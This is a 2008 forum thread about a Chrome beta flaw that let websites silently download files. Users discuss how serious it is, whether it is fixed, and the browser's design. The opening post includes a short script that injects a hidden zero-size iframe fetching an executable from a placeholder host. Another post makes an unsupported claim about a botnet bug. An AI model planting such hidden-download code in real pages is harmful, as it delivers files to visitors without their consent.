White Cuban Share Posted September 3, 2008 (edited) Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt. Example: <script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script> This is just insane. this should be on the news or something, im sure that right now this exploit isnt an hour old, but still. its spreading quick enough. Careful guys Edited April 10, 2009 by Matan Mates Title edited. Please do not use all Caps. Thanks! Link to post Share on other sites
Lant Share Posted September 3, 2008 Bugs like that are definitely expected as it is beta, although that is a very bad one. What made me get rid of it was the sentence in the ToS saying they could publish and reproduce anything you post to the internet when using Chrome. Link to post Share on other sites
EduardValencia Share Posted September 3, 2008 Omg that's evry insecure :o,anyway it's useless for Google to enter the browser Market. Link to post Share on other sites
White Cuban Author Share Posted September 3, 2008 im looking arround, bugs are appearing everywhere. i found one i think which allows a site to connect a computer to a Zombie sleeper cell net sorta for later use in DDoS attacks, jesus christ Link to post Share on other sites
Hurmoth Share Posted September 3, 2008 Of course bugs are appearing everywhere, it is a BETA. This is the first release. Can't expect it to be bug free. Just be careful where you browse (which goes for any browser). Link to post Share on other sites
39 Thieves Share Posted September 3, 2008 im looking arround, bugs are appearing everywhere. i found one i think which allows a site to connect a computer to a Zombie sleeper cell net sorta for later use in DDoS attacks, jesus christ Uh-huh... :rolleyes: What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn? Link to post Share on other sites
White Cuban Author Share Posted September 3, 2008 Uh-huh... :rolleyes: What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn? ehm... no. but there is a new exploit allowing al qaeda upload anthrax through google chrome and spread it arround infidels now lol Link to post Share on other sites
Harsesis Share Posted September 3, 2008 Its using the old version of webkit... there is a newer version that this bug is fixed on. Its the carpet bomb bug people were going crazy about before. Link to post Share on other sites
ozulus Share Posted September 3, 2008 I was wondering when something like this was going to appear. Link to post Share on other sites
.Kompressor Share Posted September 3, 2008 it is an interesting security hole. spyware, trojans, keyloggers and zombie bots will love that bypass. Link to post Share on other sites
White Cuban Author Share Posted September 3, 2008 yeah, if a guy posts about google chrome a day before 20% of his reader get it. then do the vuln on his site, if its famous blog he cant harvest thousands. Link to post Share on other sites
.Kompressor Share Posted September 3, 2008 September 2nd, 2008 Google Chrome vulnerable to carpet-bombing flaw Posted by Ryan Naraine @ 3:05 pm http://blogs.zdnet.com/security/?p=1843 http://blogs.zdnet.com/security/?p=1843&tag=nl.e539 Link to post Share on other sites
»X« Share Posted September 3, 2008 Oh dear. Thanks for the heads up. Im usually very careful anyway but I shall double my efforts. Its annoying because I really love Chrome. Link to post Share on other sites
White Cuban Author Share Posted September 3, 2008 Why, design looks like lego xD Link to post Share on other sites
mocax Share Posted September 3, 2008 damn, I was about to test incognito on porn sites I'll hold off for a while, until they fix it. Link to post Share on other sites
supernova_00 Share Posted September 3, 2008 Why, design looks like lego xD lego, pokemon ball, window media player logo...the list goes on. By the way, there is a forum dedicated to Chrome. Here is the link http://www.chrome-forums.net/phpBB3/index.php Link to post Share on other sites
39 Thieves Share Posted September 3, 2008 Why, design looks like lego xD Just curious, but might your extreme excitement and opinions on this be based in any part on a vast portion of your blog pertaining to Firefox? lego, pokemon ball, window media player logo...the list goes on.By the way, there is a forum dedicated to Chrome. Here is the link http://www.chrome-forums.net/phpBB3/index.php Um...did you just create that forum? Link to post Share on other sites
xinary Share Posted September 3, 2008 Why, design looks like lego xD Only if you are on XP. The interface on vista is sex. Link to post Share on other sites
White Cuban Author Share Posted September 3, 2008 Only if you are on XP. The interface on vista is sex. like streamed sex? :o neat Link to post Share on other sites
what Share Posted September 3, 2008 Of course bugs are appearing everywhere, it is a BETA. This is the first release. Can't expect it to be bug free.Just be careful where you browse (which goes for any browser). Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think? Link to post Share on other sites
+SOOPRcow MVC Share Posted September 3, 2008 Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think? It doesn't say the exe is being executed, it is just being downloaded so some user interaction is still required. Don't get me wrong though, I understand how serious of an issue it is. Link to post Share on other sites
- jigz - Share Posted September 3, 2008 its BETA for a reason... you find bugs, google puts in a fix.... Link to post Share on other sites
sundayx Veteran Share Posted September 3, 2008 Does Chrome auto-update? Link to post Share on other sites
39 Thieves Share Posted September 3, 2008 Does Chrome auto-update? Says it does. Link to post Share on other sites
Recommended Posts